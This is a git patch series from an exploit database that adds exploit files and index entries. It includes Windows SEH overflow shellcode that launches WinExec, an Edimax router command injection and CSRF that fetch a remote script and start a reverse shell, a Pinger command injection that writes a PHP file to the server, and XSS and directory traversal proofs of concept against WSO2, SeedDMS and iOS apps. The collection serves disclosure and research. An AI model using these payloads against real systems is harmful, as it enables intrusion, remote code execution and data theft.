+gExpotTbl = '\x33\xC9' # xor ecx, ecx +gExpotTbl += '\x33\xF6' # xor esi, esi +gExpotTbl += '\x33\xDB' # xor ebx, ebx +gExpotTbl += '\xF7\xE3' # mul ebx +gExpotTbl += '\x58' # pop eax # EAX = &kernel32 +gExpotTbl += '\x50' # push eax # [ESP] = &kernel32 +gExpotTbl += '\x03\x70\x3C' # add esi, [eax+0x3C] ; ESI = RVA NewEXEHeader +gExpotTbl += '\x03\xF0' # add esi, eax ; ESI = &NewEXEHeader +gExpotTbl += '\x03\x56\x78' # add edx, [esi+0x78] ; EDX = RVA ExportTable +gExpotTbl += '\x03\xD0' # add edx, eax ; EDX = &ExportTable = 763477B0 + +gExpotTbl += '\x03\x5A\x20' # add ebx, [edx+0x20] ; EBX = RVA ExportNameTable +gExpotTbl += '\x03\xD8' # add ebx, eax ; EBX = &ExportNameTable + +gExpotTbl += '\x03\x4A\x24' # add ecx, [edx+0x24] ; ECX = RVA ExportOrdinalTable +gExpotTbl += '\x03\xC8' # add ecx, eax ; ECX = &ExportOrdinalTable +gExpotTbl += '\x51' # push ecx + +gExpotTbl += '\x33\xFF' # xor edi, edi +gExpotTbl += '\x03\x7A\x1C' # add edi, [edx+0x1C] ; EDI = RVA ExportAddrTable +gExpotTbl += '\x03\xF8' # add edi, eax ; EDI = &ExportAddrTable +gExpotTbl += '\x57' # push edi + +fWinExec = '\x68\x57\x69\x6E\x45' # push 0x456E6957 ; EniW +fWinExec += '\x33\xC0' # xor eax, eax ; EAX = Counter + +fWinExec += '\x33\xF6' # xor esi, esi +fWinExec += '\x03\xF4' # add esi, esp ; ESI = "WinE" +fWinExec += '\xFC' # cld ; Process strings left to right +fWinExec += '\x50' # push eax +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xFF' # xor edi, edi +fWinExec += '\x03\x3C\x18' # add edi, [eax+ebx] +fWinExec += '\x58' # pop eax +fWinExec += '\x03\x7C\x24\x0C' # add edi, [esp+0xC] ; EDI = &NthNameString +fWinExec += '\xF3\xA6' # repe cmpsb ; compare [&NthNameString] to "WinExec" +fWinExec += '\x74\x03' # jz found ; If [&NthNameString] == "WinExec" end loop +fWinExec += '\x40' # inc eax ; Counter ++ +fWinExec += '\xEB\xE1' # jmp short searchLoop ; restart loop + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\x41' # inc ecx +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x03\x4C\x24\x08' # add ecx, [esp+0x8] ; ECX = &ExportOrdinalTable +fWinExec += '\x03\xC8' # add ecx, eax +fWinExec += '\x33\xC0' # xor eax, eax +fWinExec += '\x66\x03\x01' # add ax, [ecx] ; AX = ordinalNumber + +fWinExec += '\x33\xC9' # xor ecx, ecx +fWinExec += '\x41\x41\x41\x41' # inc ecx X 4 +fWinExec += '\xF7\xE1' # mul ecx +fWinExec += '\xFF\x74\x24\x04' # push dword [esp+0x4] +fWinExec += '\x01\x04\x24' # add [esp], eax +fWinExec += '\x5A' # pop edx +fWinExec += '\x33\xDB' # xor ebx, ebx +fWinExec += '\x03\x1A' # add ebx, [edx] ; EBX = RVA WinExec +fWinExec += '\x03\x5C\x24\x0C' # add ebx, [esp+0xC] ; EBX = &WinExec +# Call WinExec( CmdLine, ShowState ); +# CmdLine = "calc.exe" +# ShowState = 0x00000001 = SW_SHOWNORMAL - displays a window +callWinExec = '\x33\xC9' # xor ecx, ecx ; clear eax register +callWinExec += '\x51' # push ecx ; string terminator 0x00 for "calc.exe" string +callWinExec += '\x68\x2E\x65\x78\x65' # push 0x6578652e ; exe. : 6578652e +callWinExec += '\x68\x63\x61\x6C\x63' # push 0x636c6163 ; clac : 636c6163 +callWinExec += '\x33\xC0' # xor eax, eax +callWinExec += '\x03\xC4' # add eax, esp ; save pointer to "calc.exe" string in eax +callWinExec += '\x41' # inc ecx ; uCmdShow SW_SHOWNORMAL = 0x00000001 +callWinExec += '\x51' # push ecx ; uCmdShow - push 0x1 to stack # 2nd argument +callWinExec += '\x50' # push eax ; lpcmdLine - push string address stack # 1st argument +callWinExec += '\xFF\xD3' # call ebx ; Call the WinExec Function + +shellcode = fKernel32+gExpotTbl+fWinExec+callWinExec + +buffer = os_nSEH+nSEH+SEH+getPC+ebx2eax+getDecoder+venBlinds+os_decoder+firstHalf+shellcode +filler = '\x77'*(9000-len(buffer)) +buffer = buffer+filler + +try: + payload = buffer + f = open(File, 'w') + f.write(payload) + f.close() + print File + " created successfully" +except: + print File + ' failed to create' \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 558ffa2fb..5c32f12c6 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11026,6 +11026,7 @@ id,file,description,date,author,type,platform,port 48293,exploits/windows/local/48293.py,"Triologic Media Player 8 - '.m3l' Buffer Overflow (Unicode) (SEH)",2020-04-06,"Felipe Winsnes",local,windows, 48299,exploits/windows/local/48299.txt,"Microsoft NET USE win10 - Insufficient Authentication Logic",2020-04-06,hyp3rlinx,local,windows, 48306,exploits/windows/local/48306.txt,"Windscribe 1.83 - 'WindscribeService' Unquoted Service Path",2020-04-10,MgThuraMoeMyint,local,windows, +48314,exploits/windows/local/48314.py,"Free Desktop Clock x86 Venetian Blinds Zipper 3.0 - Unicode Stack Overflow (SEH)",2020-04-13,boku,local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 @@ -42550,3 +42551,9 @@ id,file,description,date,author,type,platform,port 48303,exploits/php/webapps/48303.txt,"Django 3.0 - Cross-Site Request Forgery Token Bypass",2020-04-08,"Spad Security Group",webapps,php, 48304,exploits/hardware/webapps/48304.py,"Amcrest Dahua NVR Camera IP2M-841 - Denial of Service (PoC)",2020-04-08,"Jacob Baines",webapps,hardware, 48308,exploits/cgi/webapps/48308.py,"Zen Load Balancer 3.10.1 - 'index.cgi' Directory Traversal",2020-04-10,"Basim Alabdullah",webapps,cgi, +48310,exploits/hardware/webapps/48310.txt,"Huawei HG630 2 Router - Authentication Bypass",2020-04-13,"Eslam Medhat",webapps,hardware, +48311,exploits/hardware/webapps/48311.py,"TVT NVMS 1000 - Directory Traversal",2020-04-13,"Mohin Paramasivam",webapps,hardware, +48312,exploits/php/webapps/48312.txt,"Webtateas 2.0 - Arbitrary File Read",2020-04-13,"China Banking and Insurance Information Technology Management Co.",webapps,php, +48313,exploits/java/webapps/48313.txt,"WSO2 3.1.0 - Arbitrary File Delete",2020-04-13,"Raki Ben Hamouda",webapps,java, +48315,exploits/php/webapps/48315.txt,"Wordpress Plugin Media Library Assistant 2.81 - Local File Inclusion",2020-04-13,"Daniel Monzón",webapps,php, +48316,exploits/php/webapps/48316.txt,"MOVEit Transfer 11.1.1 - 'token' Unauthenticated SQL Injection",2020-04-13,"Noam Moshe",webapps,php, From 0137126a8e039b1ef7ba0e343722a7e7d3ae2b90 Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 15 Apr 2020 05:01:49 +0000 Subject: [PATCH 10/18] DB: 2020-04-15 4 changes to exploits/shellcodes B64dec 1.1.2 - Buffer Overflow (SEH Overflow + Egg Hunter) Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution WSO2 3.1.0 - Persistent Cross-Site Scripting Oracle WebLogic Server 12.2.1.4.0 - Remote Code Execution --- exploits/hardware/webapps/48318.txt | 42 ++++++++ exploits/java/webapps/48319.txt | 142 ++++++++++++++++++++++++++++ exploits/java/webapps/48320.py | 90 ++++++++++++++++++ exploits/windows/local/48317.py | 55 +++++++++++ files_exploits.csv | 4 + 5 files changed, 333 insertions(+) create mode 100644 exploits/hardware/webapps/48318.txt create mode 100644 exploits/java/webapps/48319.txt create mode 100755 exploits/java/webapps/48320.py create mode 100755 exploits/windows/local/48317.py diff --git a/exploits/hardware/webapps/48318.txt b/exploits/hardware/webapps/48318.txt new file mode 100644 index 000000000..c9731d595 --- /dev/null +++ b/exploits/hardware/webapps/48318.txt @@ -0,0 +1,42 @@ +# Exploit Title: Edimax Technology EW-7438RPn-v3 Mini 1.27 - Remote Code Execution +# Date: 2020-04-13 +# Exploit Author: Wadeek +# Hardware Version: EW-7438RPn-v3 Mini +# Firmware Version: 1.23 / 1.27 +# Vendor Homepage: https://www.edimax.com/edimax/merchandise/merchandise_detail/data/edimax/global/wi-fi_range_extenders_n300/ew-7438rpn_mini/ +# Firmware Link: https://www.edimax.com/edimax/mw/cufiles/files/download/Firmware/EW-7438RPn_mini_1.27.zip + +== Shodan Dorks == + +(Setup Mode) "HTTP/1.0 302 Redirect" "Server: Boa/0.94.14rc21" "http://(null)/index.asp" +(Unsetup Mode) "HTTP/1.1 401 Unauthorized" "Server: Boa/0.94.14rc21" "Default Name:admin Password:1234" + +== Unauthorized Access - Wi-Fi Password Disclosure (Unsetup Mode) == + +GET /wizard_reboot.asp +showSSID = ""; +document.write(''+""+''); + +== Command Execution * == + +(Setup Mode) +curl 'http:///goform/mp' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +(Unsetup Mode with default password) +curl 'http:///goform/mp' -H 'Authorization: Basic YWRtaW46MTIzNA==' --data 'command=%7C%7C+busybox+wget+-O+-+http%3A%2F%2F%2Fdelivery.sh+%7C+%2Fbin%2Fsh' + +== Cross-Site Request Forgery -> Command Execution * == + +
+ + +
+ +* [ delivery.sh ] +-------------------------------------------------------------------------------------- +# (msfvenom) linux/mipsbe/shell/reverse_tcp +cd /tmp/ +busybox wget -O reverse http:///reverse +busybox chmod +x reverse +./reverse & +-------------------------------------------------------------------------------------- \ No newline at end of file diff --git a/exploits/java/webapps/48319.txt b/exploits/java/webapps/48319.txt new file mode 100644 index 000000000..8aa2b6577 --- /dev/null +++ b/exploits/java/webapps/48319.txt @@ -0,0 +1,142 @@ +# Title: WSO2 3.1.0 - Persistent Cross-Site Scripting +# Date: 2020-04-13 +# Author: raki ben hamouda +# Vendor: https://apim.docs.wso2.com +# Softwrare link: https://apim.docs.wso2.com/en/latest/ +# CVE: N/A +# Advisory: https://docs.wso2.com/display/Security/Security+Advisory+WSO2-2020-0700 + +Technical Details & Description: +================================ +A remote Stored Cross Site Scripting has been discovered in WSO2 API +Manager Ressource Browser component). +The security vulnerability allows a remote attacker With access to the +component "Ressource Browser" +to inject a malicious code in Add Comment Feature. + +The vulnerability is triggered after sending a POST request to +`/carbon/info/comment-ajaxprocessor.jsp` with Parameter +"comment=targeted&path=%2F". +Remote attackers has the ablility to spread a malware,to Hijack a session +(a session with Higher privileges), or to initiate phishing attacks. + +The security risk of the Stored XSS web vulnerability is estimated as +medium with a cvss (common vulnerability scoring system) count of 5.4 +Exploitation of the Stored XSS web vulnerability requires a low privilege +web-application user account and medium or high user interaction. +Successful exploitation of the vulnerability results in Compromising the +server . + + +Request Method: +[+] POST + +Module: +[+] /carbon/info/comment-ajaxprocessor.jsp + +Parameters: +[+] comment=admincomment +[+] path=%2F +======================================= + +POST /carbon/info/comment-ajaxprocessor.jsp HTTP/1.1 +Host: 192.168.149.1:9443 +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 +Firefox/60.0 +Accept: text/javascript, text/html, application/xml, text/xml, */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: +https://192.168.149.1:9443/carbon/resources/resource.jsp?region=region3&item=resource_browser_menu&path=/ +X-Requested-With: XMLHttpRequest, XMLHttpRequest +X-Prototype-Version: 1.5.0 +Content-type: application/x-www-form-urlencoded; charset=UTF-8 +X-CSRF-Token: L4OB-I2K8-W66N-K44H-JNSM-6L0Z-BB17-BGWH +Content-Length: 64 +Cookie: region3_registry_menu=visible; region3_metadata_menu=none; +wso2.carbon.rememberme=admin-0db64b12-e661-4bc8-929d-6ab2cc7b192e; +JSESSIONID=4B3AB3AA8895F2897685FA98C327D521; +requestedURI=../../carbon/admin/index.jsp; region1_configure_menu=none; +region4_monitor_menu=none; region5_tools_menu=none; +current-breadcrumb=registry_menu%252Cresource_browser_menu%2523 +Connection: close + +comment=%3Ciframe%20href%3Dhttp%3A%2F%2Fphishing_url%3E&path=%2F + + + + + +============================== + + + +HTTP/1.1 200 + +X-Content-Type-Options: nosniff +X-XSS-Protection: 1; mode=block +X-Frame-Options: DENY +vary: accept-encoding +Content-Type: text/html;charset=UTF-8 +Content-Language: en-US +Date: Tue, 31 Dec 2019 10:50:00 GMT +Connection: close +Server: WSO2 Carbon Server +Content-Length: 3144 + + +//the body of response includes attacker malicious script + + +  + + + + + +PoC: Vulnerable Source (Listing - Index) + + +

Contacts 09:17:12:PM 10:Apr.:2020 .vcf

+ +

26.40 KB

+ + + + + + + + +PoC: Exception-Handling +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >" +09:17:12:PM 10:Apr.:2020 .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts 09:17:12:PM 10:Apr.:2020 >" .vcf" +- +Internal Server Error: Failed moving "/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf" +to "/Contacts >"09:17:12:PM 10:Apr.:2020 .vcf" + + +PoC: Exploit +BEGIN:VCARD +VERSION:3.0 +PRODID:-//Apple Inc.//iPhone OS 12.4.5//EN +B:Kunz Mejri ;>" ;;; +END:VCARD + + +--- PoC Session Logs [POST] --- +http://localhost/move +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 187 +Origin: http://localhost +Connection: keep-alive +Referer: http://localhost/ +oldPath=/Contacts 09:17:12:PM 10:Apr.:2020 +.vcf&newPath=/evil-filename>".vc +- +POST: HTTP/1.1 500 Internal Server Error +Content-Length: 593 +Content-Type: text/html; charset=utf-8 +Connection: Close +Server: GCDWebUploader +- +http://localhost/evil.source +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Referer: http://localhost/ +- +GET: HTTP/1.1 200 OK +Server: GCDWebUploader +Connection: Close + + +Solution - Fix & Patch: +======================= +1. Parse and filter the vcf name values next to add, edit or imports to +prevent an execution +2. Restrict and filter in the index listing the vcf names to sanitize +the output + + +Security Risk: +============== +The security risk of the persistent vcf cross site scripting web +vulnerability is estimated as medium. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ + + + + +-- +VULNERABILITY LABORATORY - RESEARCH TEAM \ No newline at end of file diff --git a/exploits/ios/webapps/48327.txt b/exploits/ios/webapps/48327.txt new file mode 100644 index 000000000..6063109bf --- /dev/null +++ b/exploits/ios/webapps/48327.txt @@ -0,0 +1,245 @@ +# Title: File Transfer iFamily 2.1 - Directory Traversal +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Software Link: http://www.dedecms.com/products/dedecms/downloads/ +# CVE: N/A + +Document Title: +=============== +File Transfer iFamily v2.1 - Directory Traversal Vulnerability + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2199 + + +Release Date: +============= +2020-04-14 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2199 + + +Common Vulnerability Scoring System: +==================================== +7.1 + + +Vulnerability Class: +==================== +Directory- or Path-Traversal + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +Send photos, videos and documents to other devices without Internet. A +complete application to exchange files +wirelessly between devices. It uses the Multipeer Connectivity Framework +to search and connect to available devices, +without the need of internet connection or any kind of server and database. + +(Copy of the Homepage: +https://apps.apple.com/us/app/file-transfer-ifamily-files-photo-video-documents-wifi/id957971575 +) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered a directory +traversal web vulnerability in the official File Transfer iFamily v2.1 +ios mobile application. + + +Affected Product(s): +==================== +DONG JOO CHO +Product: File Transfer iFamily v2.1 - iOS Mobile Web Application + + +Vulnerability Disclosure Timeline: +================================== +2020-04-14: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +High + + +Authentication Type: +==================== +Pre auth - no privileges + + +User Interaction: +================= +No User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +A directory traversal web vulnerability has been discovered in the +official File Transfer iFamily v2.1 ios mobile application. +The vulnerability allows remote attackers to change the application path +in performed requests to compromise the local application +or file-system of a mobile device. Attackers are for example able to +request environment variables or a sensitive system path. + +The directory-traversal web vulnerability is located in the main +application path request performed via GET method. Attackers are +able to request for example the local ./etc/ path of the web-server by +changing the local path in the performed request itself. +In a first request the attack changes the path, the host redirects to +complete the adress with "..". Then the attacker just +attaches a final slash to its request and the path can be accessed via +web-browser to download local files. + +Exploitation of the directory traversal web vulnerability requires no +privileged web-application user account or user interaction. +Successful exploitation of the vulnerability results in information +leaking by unauthorized file access and mobile application compromise. + + +Proof of Concept (PoC): +======================= +The directory traversal vulnerability can be exploited by attackers with +access to the wifi interface in a local network without user interaction. +For security demonstration or to reproduce the security vulnerability +follow the provided information and steps below to continue. + + +PoC: Exploitation +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +http://localhost//../ + + +--- PoC Session Logs [GET]] --- +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 +- +http://localhost../etc/ +Host: localhost.. +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- add slash to correct host adress (/.././) +http://localhost/./ +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:75.0) +Gecko/20100101 Firefox/75.0 +Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +- Access granted +http://localhost/../../../../../../../../../../../../../../../../../../../../../../ +GET: HTTP/1.1 200 OK +Accept-Ranges: bytes +Content-Length: 2521 + + +Solution - Fix & Patch: +======================= +The vulnerability can be patched by a restriction of the visible and +accessable ./etc/ path in the app container. +Disallow path changes in the client-side get method requests and +validate them securely. + + +Security Risk: +============== +The security risk of the directory travsersal web vulnerability in the +ios mobile application is estimated as high. + + +Credits & Authors: +================== +Vulnerability-Lab - +https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab +Benjamin Kunz Mejri - +https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M. + + +Disclaimer & Information: +========================= +The information provided in this advisory is provided as it is without +any warranty. Vulnerability Lab disclaims all warranties, +either expressed or implied, including the warranties of merchantability +and capability for a particular purpose. Vulnerability-Lab +or its suppliers are not liable in any case of damage, including direct, +indirect, incidental, consequential loss of business profits +or special damages, even if Vulnerability-Lab or its suppliers have been +advised of the possibility of such damages. Some states do +not allow the exclusion or limitation of liability for consequential or +incidental damages so the foregoing limitation may not apply. +We do not approve or encourage anybody to break any licenses, policies, +deface websites, hack into databases or trade with stolen data. + +Domains: www.vulnerability-lab.com www.vuln-lab.com +www.vulnerability-db.com +Services: magazine.vulnerability-lab.com +paste.vulnerability-db.com infosec.vulnerability-db.com +Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab +youtube.com/user/vulnerability0lab +Feeds: vulnerability-lab.com/rss/rss.php +vulnerability-lab.com/rss/rss_upcoming.php +vulnerability-lab.com/rss/rss_news.php +Programs: vulnerability-lab.com/submit.php +vulnerability-lab.com/register.php +vulnerability-lab.com/list-of-bug-bounty-programs.php + +Any modified copy or reproduction, including partially usages, of this +file requires authorization from Vulnerability Laboratory. +Permission to electronically redistribute this alert in its unmodified +form is granted. All other rights, including the use of other +media, are reserved by Vulnerability-Lab Research Team or its suppliers. +All pictures, texts, advisories, source code, videos and other +information on this website is trademark of vulnerability-lab team & the +specific authors or managers. To record, list, modify, use or +edit our material contact (admin@ or research@) to get a ask permission. + + Copyright © 2020 | Vulnerability Laboratory - [Evolution +Security GmbH]™ \ No newline at end of file diff --git a/exploits/php/webapps/48323.txt b/exploits/php/webapps/48323.txt new file mode 100644 index 000000000..e6038c894 --- /dev/null +++ b/exploits/php/webapps/48323.txt @@ -0,0 +1,75 @@ +# Title: Pinger 1.0 - Remote Code Execution +# Date: 2020-04-13 +# Author: Milad Karimi +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A + +================================================================================ +Pinger 1.0 - Simple Pinging Webapp Remote Code Execution +================================================================================ +# Vendor Homepage: https://github.com/wcchandler/pinger +# Software Link: https://github.com/wcchandler/pinger +# Date: 2020.04.13 +# Author: Milad Karimi +# Tested on: windows 10 , firefox +# Version: 1.0 +# CVE : N/A +================================================================================ +# Description: +simple, easy to use jQuery frontend to php backend that pings various +devices and changes colors from green to red depending on if device is +up or down. + +# PoC : + +http://localhost/pinger/ping.php?ping=;echo '' >info.php +http://localhost/pinger/ping.php?socket=;echo '' >info.php + + +# Vulnerabile code: + + if(isset($_GET['ping'])){ + // if this is ever noticably slower, i'll pass it stuff when called + // change the good.xml to config.xml, good is what I use at $WORK + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['ping'] == ""){ + $host = "127.0.0.1"; + }else{ + $host = $_GET['ping']; + } + $out = trim(shell_exec('ping -n -q -c 1 -w '.$xml->backend->timeout + .' '.$host.' | grep received | awk \'{print $4}\'')); + $id = str_replace('.','_',$host); + + if(($out == "1") || ($out == "0")){ + echo json_encode(array("id"=>"h$id","res"=>"$out")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + if(isset($_GET['socket'])){ + $xml = simplexml_load_file("config.xml"); + //$xml = simplexml_load_file("good.xml"); + if($_GET['socket'] == ""){ + $host = "127.0.0.1 80"; + }else{ + $host = str_replace(':',' ',$_GET['socket']); + } + $out = shell_exec('nc -v -z -w '.$xml->backend->timeout.' '.$host.' 2>&1'); + $id = str_replace('.','_',$host); + $id = str_replace(' ','_',$id); + if(preg_match("/succeeded/",$out)){ + echo json_encode(array("id"=>"h$id","res"=>"1")); + }else{ + ## if it returns nothing, assume network is messed up + echo json_encode(array("id"=>"h$id","res"=>"0")); + } + } + + ?> \ No newline at end of file diff --git a/exploits/php/webapps/48324.txt b/exploits/php/webapps/48324.txt new file mode 100644 index 000000000..b44c3167f --- /dev/null +++ b/exploits/php/webapps/48324.txt @@ -0,0 +1,352 @@ +# Title: SeedDMS 5.1.18 - Persistent Cross-Site Scripting +# Author: Vulnerability Laboratory +# Date: 2020-04-15 +# Vendor: https://www.seeddms.org +# Software Link: https://www.seeddms.org/index.php?id=7 +# CVE: N/A + +Document Title: +=============== +SeedDMS v5.1.18 - Multiple Persistent Web Vulnerabilities + + +References (Source): +==================== +https://www.vulnerability-lab.com/get_content.php?id=2209 + + +Release Date: +============= +2020-04-15 + + +Vulnerability Laboratory ID (VL-ID): +==================================== +2209 + + +Common Vulnerability Scoring System: +==================================== +4.3 + + +Vulnerability Class: +==================== +Cross Site Scripting - Persistent + + +Current Estimated Price: +======================== +1.000€ - 2.000€ + + +Product & Service Introduction: +=============================== +SeedDMS is a free document management system with an easy to use web +based user interface. It is based on PHP and +MySQL or sqlite3 and runs on Linux, MacOS and Windows. Many years of +development has made it a mature, powerful +and enterprise ready platform for sharing and storing documents. It's +fully compatible with its predecessor LetoDMS. + +(Copy of the Homepage: https://www.seeddms.org/index.php?id=2 & +https://www.seeddms.org/index.php?id=7 ) + + +Abstract Advisory Information: +============================== +The vulnerability laboratory core research team discovered multiple +persistent vulnerabilities in the SeedDMS v5.1.16 & v5.1.18 web-application. + + +Affected Product(s): +==================== +Uwe Steinmann +Product: SeedDMS - Content Management System v4.3.37, v5.0.13, v5.1.14, +v5.1.16, v5.1.18 and v6.0.7 + + +Vulnerability Disclosure Timeline: +================================== +2020-04-15: Public Disclosure (Vulnerability Laboratory) + + +Discovery Status: +================= +Published + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +=============== +Medium + + +Authentication Type: +==================== +Restricted authentication (user/moderator) - User privileges + + +User Interaction: +================= +Low User Interaction + + +Disclosure Type: +================ +Independent Security Research + + +Technical Details & Description: +================================ +Multiple persistent cross site web vulnerabilities has been discovered +in the SeedDMS v4.3.37, v5.0.13, v5.1.14 and v6.0.7 web-application. +The vulnerability allows remote attackers to inject own malicious script +codes with persistent attack vector to compromise browser to +web-application requests from the application-side. + +The persistent cross site scripting web vulnerabilities are located in +the `name` and `comment` parameter of the `AddEvent.php` file. +Remote attackers are able to add an own event via op.AddEvent with +malicious script codes. The request method to inject is POST +and the attack vector is located on the application-side. After the +inject the execution occurs in the admin panel within the +`Log Management` - `Webdav` and `Web` on view. The content of the +comment and name is unescaped pushed inside of the logs with +a html/js template. Thus allows an attacker to remotly exploit the issue +by a simple post inject from outside with lower privileges. + +Successful exploitation of the vulnerability results in session +hijacking, persistent phishing attacks, persistent external redirects +to malicious source and persistent manipulation of affected or connected +application modules. + +Request Method(s): +[+] POST + +Vulnerable Module(s): +[+] op.AddEvent (AddEvent.php) + +Vulnerable Parameter(s): +[+] name +[+] comment + +Affected Module(s): +[+] Log Management (out.LogManagement.php) + + +Proof of Concept (PoC): +======================= +The persistent web vulnerability can be exploited by remote attackers +with low privileged web-application user account and low user interaction. +For security demonstration or to reproduce the security web +vulnerability follow the provided information and steps below to continue. + + +Manual steps to reproduce the vulnerability ... +1. Start your local webbrowser and tamper the http protocol session +2. Open the AddEvent.php and add a new event +3. Insert your script code test payload inside the Name or Comments path +4. Save or submit the entry with error +Note: Now the web and webdav log has captured the insert or erro +5. Now wait until the administrator previews in the log management the +web or webdav view function +6. Successful reproduce of the persistent web vulnerability! + + +PoC: Vulnerable Source (Log Management - View) +
Apr 13 19:23:22  [info] admin (localhost) op.RemoveLog
+?logname=20200413.log
+Apr 13 19:29:53  [info] admin (localhost) op.AddEvent ?name="
+&comment=&from=1586728800&to=1586815199
+
